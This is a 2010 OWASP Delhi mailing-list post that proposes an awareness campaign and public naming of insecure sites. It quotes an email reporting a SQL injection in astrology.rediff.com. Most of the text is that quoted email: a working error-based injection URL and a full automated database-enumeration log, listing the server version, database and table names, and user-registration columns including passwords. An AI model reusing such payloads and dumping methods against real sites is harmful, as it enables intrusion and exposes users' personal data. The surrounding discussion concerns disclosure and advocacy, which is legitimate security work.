[Owasp-delhi] Rediff Astrology

Lakshmanan, Sriram sriram_lakshmanan at uhc.com
Wed Jun 16 04:21:28 EDT 2010

I don't know if it can happen under the ageis of OWASP or not but maybe
we need something like a Jagorey campaign and a "fall of shame". I'm
banking on this group's collective wisdom to do something...

*
	The Jagorey like campaign is for the CxO forums who are often
unware of the problem in their own backyard as the tech manager never
notified them or didn't give them enough gyan (specially to CTO/CISO).
Maybe leverage NASSCOM for such forums (for contact points)
*
	The fall of shame is for sites we identity as "bad" weak thru
non-intriusive testing and advise the public about the risks of the
weakness exists even after notification to the company. I understand
such a list opens up more hacks/attacks, and thus we can refrain from
displaying the vulnerable url and details on the attack. CERT-in may be
leveraged for this. I also do not know the complete legal interpretation
of such a move (which may include defamation suits)

The point I'm trying to make is we know we have issues, with corporate
indfifference to security, with laws that are not enforced well, with
"security people" just doing what I call "khanapoorti" i.e action for
the sake of it. The problems will not go away. As a responsibile
community can we create a task force and collectively do something?. I
do understand the individual efforts like Nilesh's / Sripathi's or
Subhash's and others have fallen on deaf ears and is
frustrating....maybe concerted and joint efforts will bear fruits.

Additional thoughts/comments/feedback...

 PS: I use Jagorey like as refernce, as Jagorey campaign is a TV advt
showing a movement against corruption.

warm regards,

Sriram

SEC_R_TY. U & I are in it together. Everyone's responsible - Everywhere

________________________________

From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
To: dhruv.soi at owasp.org
Subject: Rediff Astrology

y0,

h0rr1bl3 th4n h0rr0r

Vulnerable Url :

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac
=Scorpiox%27%20OR%201=convert%28int,@@version%29--

+     -==  MSSQL Information Schema astrology.rediff.com  ==-     +

[ + ] URL :
http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo

diac=Scorpiox'

[ + ] Date: Tue May 18 20:58:26 2010

[ + ] Displaying information about MSSQL host !

[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel
X86)

                        Aug  6 2000 00:57:48

                        Copyright (c) 1988-2000 Microsoft Corporation

                        Standard Edition on Windows NT 5.0 (Build 2195:
Service

Pack 4)

[ + ] USER ()          : dbo

[ + ] S_USER ()        : astrology

[ + ] DB_NAME ()       : astro

[ + ] HOST_NAME ()     : ASTROLOGY

[ + ] SERVER_NAME ()   : SEARCHDB

[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0

[ + ] X-POWERED-By ()  : ASP.NET

[ + ] IP_ADDRESS_INFO  : 202.54.124.173

[ - ] We Can't get number of Databases !

[ ! ] Start dumping database Names !

[ ? ] But first choice number of DB to dump :> 20

[ + ] Displaying list of 20 databases on this MSSQL host !

[ DATABASE: 0 ]        : astro

[ DATABASE: 1 ]        : master

[ DATABASE: 2 ]        : tempdb

[ DATABASE: 3 ]        : model

[ DATABASE: 4 ]        : msdb

[ DATABASE: 5 ]        : pubs

[ DATABASE: 6 ]        : Northwind

[ DATABASE: 7 ]        : travel

[ DATABASE: 8 ]        : travel_int

[ DATABASE: 9 ]        : astro

[ DATABASE: 10 ]        : Jobsearch

[ DATABASE: 11 ]        : astroyogiD

[ DATABASE: 12 ]        : matrimonial

[ DATABASE: 13 ]        : investornew

[ DATABASE: 14 ]        : test

[ ! ] Vulnerability Database is   :  astro

[ + ] Displaying Tables inside DB :> astro

[ ? ] Numbers of Tables To Dispaly ?

[ + ] Specify Numbers   :> 200

[ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION

[ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER

[ TABLES: 2 ]          : astrolove

[ TABLES: 3 ]          : astroparent

[ TABLES: 4 ]          : CITY

[ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL

[ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL

[ TABLES: 7 ]          : COUNTRY

[ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS

[ TABLES: 9 ]          : CUSTOMER_CARE_MASTER

[ TABLES: 10 ]          : CUSTOMER_PERSON1

[ TABLES: 11 ]          : CUSTOMER_PERSON2

[ TABLES: 12 ]          : CUSTOMER_PERSON3

[ TABLES: 13 ]          : darshtest

[ TABLES: 14 ]          : dtproperties

[ TABLES: 15 ]          : FENGSHUI

[ TABLES: 16 ]          : FRANCHISEE_MASTER

[ TABLES: 17 ]          : idealmate

[ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER

[ TABLES: 19 ]          : NUMEROLOGY

[ TABLES: 20 ]          : ORDER_DETAILS

[ TABLES: 21 ]          : ORDER_MASTER

[ TABLES: 22 ]          : ORDER_REMARKS

[ TABLES: 23 ]          : ORDERS

[ TABLES: 24 ]          : p1

[ TABLES: 25 ]          : p3master

[ TABLES: 26 ]          : PALMISTRY

[ TABLES: 27 ]          : PAYMENT_METHOD_MASTER

[ TABLES: 28 ]          : PROBLEM_ANSWER

[ TABLES: 29 ]          : PROBLEM_CATEGORY

[ TABLES: 30 ]          : REGISTRATION

[ TABLES: 31 ]          : SHIPPING_DETAILS

[ TABLES: 32 ]          : SPCFIC_ANLYS

[ TABLES: 33 ]          : SUBSCRIBER_DETAILS

[ TABLES: 34 ]          : SUBSCRIBER_MASTER

[ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION

[ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION

[ TABLES: 37 ]          : SUBSCRIPTION_DETAILS

[ TABLES: 38 ]          : SUBSCRIPTION_MASTER

[ TABLES: 39 ]          : sysconstraints

[ TABLES: 40 ]          : syssegments

[ TABLES: 41 ]          : test

[ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION

[ TABLES: 43 ]          : zodiac

[ + ] Done !

[ + ] Start dumping all Columns from table :> REGISTRATION

[ ? ] Numbers of Columns To Display ?

[ + ] Specify Numbers    :> 50

[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database:
astro

[ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID

[ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID

[ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS

[ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY

[ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE

[ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE

[ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR

[ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES

[ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO

[ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY

[ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE

[ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID

[ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME

[ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER

[ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID

[ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP

[ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME

[ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD

[ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO

[ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME

[ ! ] Done !

[ ! ] All information was recorded in astrology.rediff.com.txt file !

[ 1 ] : Return to Tables  !

[ 2 ] : Return to Columns !

[ ? ] : Oprion :>

Thanks & Regards